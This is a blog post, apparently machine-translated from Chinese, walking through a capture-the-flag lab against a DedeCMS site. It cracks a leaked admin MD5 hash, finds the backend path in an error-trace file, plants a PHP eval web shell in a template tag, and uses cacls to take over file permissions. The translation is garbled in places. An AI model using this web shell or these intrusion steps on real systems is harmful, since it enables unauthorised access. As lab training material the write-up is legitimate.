渗透测试真的很简单嘛,“渗透测试”

声明仅供学习,禁止用于违法行为。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。题目地址https://www.ichu

陈述

仅用于教育目的,不得用于非法活动。请不要利用文章中的相关技术进行非法测试。由此产生的任何负面后果与文章作者及本公众号无关。

标题地址

https://www.ichunqiu.com/experiment/detail?id=51123source=1otype=1

问题要求

请求获取目标网站的FLAG信息

316506c8aa70482795356330ed058d64~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=70m909lNl0hfDJoeJkyjA2FZY4w%3D

打开环境后的页面

c665037d5990453a9f8734f416b4de27~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=4HEsiaCw1btKB0WptcP2mbcsrrc%3D

按照提示,我进入http://file.ichunqiu.com/49ba59ab并下载了dedeCMS。我下载的是一个可以一键泄露账户密码的软件。

b1ffcf1d73444ea495079f19595dfa9e~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=sPriRwQzWSef104QNfg%2FTyXuWP4%3D

请输入爆破目标地址http://www.test.ichunqiu

66b5efa1796f4a349a1c3037e4ab0637~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=x8%2Budd5wxS2I5ihAjroN59cT7JY%3D

获取账号和密码的MD5值

解密加密的MD5 值

在线MD5解密:https://www.somd5.com/

获取密码:only_system

725d041e8c9f4164a473e91f034e8342~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=C7BqSrb3fNJ5v2j1aRenZWRTNEU%3D

我有账号和密码。但后台地址未知,所以扫描后台目录。

您的环境中的工具包括许多用于目录扫描的工具。

2e9d9b8742b2423ab2780e88ecafb716~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=0ePuAen78a7HYx7d0OFxUFnn%2FpE%3D

这里使用御剑后台扫描工具

63d15c7413e344678feb4697e24dc820~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=92CXduaElM2GIL4f2wBB01K53ds%3D

检查完每个地址后,发现所需的后台地址都没有,于是我尝试换字典和扫描仪进行扫描,但还是发现没有后台地址。

如何在百度上找到Dreamweaver CMS后端

日志暴露后端地址

https://blog.csdn.net/forest_fire/article/details/50944689

fe10c030cde4461db206863850f531f5~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=ywPcwK1Kj7eZmXJPjG8YWS3V9j0%3D

可以看到,可以从错误文件/data/mysql_error_trace.inc或/data/mysqli_error_trace.inc中检索到泄露的后台路径。

http://www.test.ichunqiu/data/mysql_error_trace.inc 目录找到

7b3a9b61894b4cc4afa00ba80e6c531d~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=n%2F120kyl6CI%2FaYYhb3TlEJUxQJo%3D

当你访问它时,你会看到它是一个后端地址。

b26a4b5fb63c4148af1c33c4b3417bff~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=slVNDGQVS2bEqSYEp07ZLALUXX4%3D

使用我的账号和密码登录后,就可以成功访问后台了。

7f762512f3bd4e9bb34357a2184fea0f~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=Ksi5jvp3qXfl4mRgJnQBKk6kmlY%3D

接下来,您需要上传Web shell并获取主机权限。

百度搜索获取WebShell方法

https://www.cnblogs.com/milantgh/p/3634550.html

在后台界面中,您会注意到您可以在模板标签的源代码管理区域中添加新标签或编辑现有注释。

2be1d825deb044e7bd36766a34f2b6bb~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=v%2Bvj3%2BJYpIlKiKOttMcMssLIDko%3D

在这里,编辑现有标签,写入文本,然后保存。

?php @eval($_POST[‘lemonlove7’]);

顶部还有一个提示,告诉您文件的保存位置。

04604facda2c4331b33916ffc9ab317a~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=HHlDn75hECHABbfcZ1RXehqTZEo%3D

访问那里并使用环境附带的切肉刀进行连接

14514aa197074fbbb32f38e6c311fbd4~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=VbEh4HAdWQ9RxuY8pebh3342iqs%3D

成功获得贝壳

4c5e542c83fb49d2a7fe3f481e1a7fc4~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=KgiGPXAOzWf3%2BsZ%2Fv%2BukLncnl5s%3D

我查看了位于C盘“文档和设置”–“管理员”–桌面上的flag~ichunqiu.txt文件。

b21302cb11024c09ba362a6d57dad5d1~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=rbgg5DhmuYiJuPXmpikbcrS0CfE%3D

我查了一下,是空的,但是文件大小不为0。

039ee56c8787456c8b1651699f239a64~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=DpNZKjePhXvNDtWJE%2BzJ612ZlKY%3D

使用cmd 命令中的type 验证访问是否被拒绝。原来是你的权限不够。

9222b063df9a4f759e7b81bbe7b63642~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=ZfXRDV%2Fgp8gaRSkHAkSWeyMCaTw%3D

使用whoami 显示当前用户权限

谁阿米290797afde394605bc0c2b9ca3efaa62~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=7n8ctpuqSu6WousihyfsL8z1dpA%3D

我发现所有系统都有最高权限,但是我发现百度可能设置了文件权限。

如何在Windows中设置文件和文件夹权限:https://www.jb51.net/article/51907.htm

2eeba1a453bf4684a536973417fac5a3~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=ql2uEYcX3hZ74K7vjsgnBKKcR4A%3D

如果使用cacls命令检查falg~ichunqiu.flag文件的权限,你会看到系统用户有n个权限。这意味着你没有权限。

cacls标志~ichunqiu.txt 4089a6f84d304dafa866bf156dc0c072~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=e5A2IVJWTWw911ST1Hw7nQ1Sks4%3D

使用cacls 命令将flg~ichunqiu.flag 文件的权限更改为F。

cacls标志~ichunqiu.txt /E /P system:F /C bd37b6ce8f694eae88d2cb38471ecffd~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=Q1gbSdYUUq6S7N0me5Ayb02M1Jw%3D

我成功拿到flag了

输入标志~ichunqiu.txt 8294dc4dfb4e478aae468c7dfa43dbfe~noop.image?_iz=58558&from=article.pc_detail&lk3s=953192f4&x-expires=1717784265&x-signature=NmhEN%2Fn3q98FeP0QVu5%2FUijGACM%3D

结尾

与专家一起成长,学习网络安全知识。

文章来源:鹏集团安全

如有侵犯版权,请联系我们删除。

原创文章,作者:小条,如若转载,请注明出处:https://www.sudun.com/ask/83909.html

Like (0)
小条的头像小条
Previous 2024年6月1日 上午2:17
Next 2024年6月1日 上午2:18

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注